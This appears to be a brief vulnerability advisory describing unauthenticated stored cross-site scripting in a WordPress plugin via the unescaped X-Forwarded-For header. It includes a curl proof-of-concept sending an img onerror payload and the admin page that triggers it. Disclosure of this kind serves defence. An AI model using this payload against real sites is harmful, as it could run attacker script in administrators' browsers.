Description The plugin does not sanitise and escape the X-Forwarded-For header before outputting its content on the page, which allows unauthenticated users to perform Cross-Site Scripting attacks.
curl https://example.com -H 'X-Forwarded-For: <img src=x onerror=alert(/xss/)>'
Then, as a high-privileged user, visit `/wp-admin/index.php?page=useronline`